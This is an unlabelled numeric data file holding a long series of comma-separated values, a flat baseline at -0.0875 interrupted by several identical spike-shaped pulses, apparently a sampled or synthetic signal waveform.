-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 
-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0625, -0.0375, -0.00625, 0.01875, 0.04375, 0.075, 0.1, 0.13125, 0.15625, 0.18125, 0.2125, 0.2375, 0.2625, 0.29375, 0.31875, 0.35, 0.375, 0.4, 0.43125, 0.45625, 0.48125, 0.5125, 0.5375, 0.56875, 0.59375, 0.61875, 0.65, 0.675, 0.7, 0.73125, 0.75625, 0.7875, 0.75625, 0.73125, 0.7, 0.675, 0.65, 
0.61875, 0.59375, 0.56875, 0.5375, 0.5125, 0.48125, 0.45625, 0.43125, 0.4, 0.375, 0.35, 0.31875, 0.29375, 0.2625, 0.2375, 0.2125, 0.18125, 0.15625, 0.13125, 0.1, 0.075, 0.04375, 0.01875, -0.00625, -0.0375, -0.0625, -0.0875, -0.1125, -0.1375, -0.16875, -0.19375, -0.16875, -0.1375, -0.1125, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 
-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 
-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0625, -0.0375, -0.00625, 0.01875, 0.04375, 0.075, 0.1, 0.13125, 0.15625, 0.18125, 0.2125, 0.2375, 0.2625, 0.29375, 0.31875, 0.35, 0.375, 0.4, 0.43125, 0.45625, 0.48125, 0.5125, 0.5375, 0.56875, 0.59375, 0.61875, 0.65, 0.675, 0.7, 0.73125, 0.75625, 0.7875, 0.75625, 0.73125, 0.7, 0.675, 0.65, 0.61875, 0.59375, 0.56875, 0.5375, 0.5125, 0.48125, 0.45625, 0.43125, 0.4, 0.375, 0.35, 0.31875, 0.29375, 0.2625, 0.2375, 0.2125, 0.18125, 0.15625, 0.13125, 0.1, 0.075, 0.04375, 0.01875, -0.00625, -0.0375, -0.0625, -0.0875, -0.1125, -0.1375, -0.16875, -0.19375, -0.16875, -0.1375, -0.1125, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 
-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 
-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0625, -0.0375, -0.00625, 0.01875, 0.04375, 0.075, 0.1, 0.13125, 0.15625, 0.18125, 0.2125, 0.2375, 0.2625, 0.29375, 0.31875, 0.35, 0.375, 0.4, 0.43125, 0.45625, 0.48125, 0.5125, 0.5375, 0.56875, 0.59375, 0.61875, 0.65, 0.675, 0.7, 0.73125, 0.75625, 0.7875, 0.75625, 0.73125, 0.7, 0.675, 0.65, 0.61875, 0.59375, 0.56875, 0.5375, 0.5125, 0.48125, 0.45625, 0.43125, 0.4, 0.375, 0.35, 0.31875, 0.29375, 0.2625, 0.2375, 0.2125, 0.18125, 0.15625, 0.13125, 0.1, 0.075, 0.04375, 0.01875, -0.00625, -0.0375, -0.0625, -0.0875, -0.1125, -0.1375, -0.16875, -0.19375, -0.16875, -0.1375, -0.1125, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 
-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 
-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 
-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0625, -0.0375, -0.00625, 0.01875, 0.04375, 0.075, 0.1, 0.13125, 0.15625, 0.18125, 0.2125, 0.2375, 0.2625, 0.29375, 0.31875, 0.35, 0.375, 0.4, 0.43125, 0.45625, 0.48125, 0.5125, 0.5375, 0.56875, 0.59375, 0.61875, 0.65, 0.675, 0.7, 0.73125, 0.75625, 0.7875, 0.75625, 0.73125, 0.7, 0.675, 0.65, 0.61875, 0.59375, 0.56875, 0.5375, 0.5125, 0.48125, 0.45625, 0.43125, 0.4, 0.375, 0.35, 0.31875, 0.29375, 0.2625, 0.2375, 0.2125, 0.18125, 0.15625, 0.13125, 0.1, 0.075, 0.04375, 0.01875, -0.00625, -0.0375, -0.0625, -0.0875, -0.1125, -0.1375, -0.16875, -0.19375, -0.16875, -0.1375, -0.1125, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 
-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 
-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0625, -0.0375, -0.00625, 0.01875, 0.04375, 0.075, 0.1, 0.13125, 0.15625, 0.18125, 0.2125, 0.2375, 0.2625, 0.29375, 0.31875, 0.35, 0.375, 0.4, 0.43125, 0.45625, 0.48125, 0.5125, 0.5375, 0.56875, 0.59375, 0.61875, 0.65, 0.675, 0.7, 0.73125, 0.75625, 0.7875, 0.75625, 0.73125, 0.7, 0.675, 0.65, 0.61875, 0.59375, 0.56875, 0.5375, 0.5125, 0.48125, 0.45625, 0.43125, 0.4, 0.375, 0.35, 0.31875, 0.29375, 0.2625, 0.2375, 0.2125, 0.18125, 0.15625, 0.13125, 0.1, 0.075, 0.04375, 0.01875, -0.00625, -0.0375, -0.0625, -0.0875, -0.1125, -0.1375, -0.16875, -0.19375, -0.16875, -0.1375, -0.1125, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 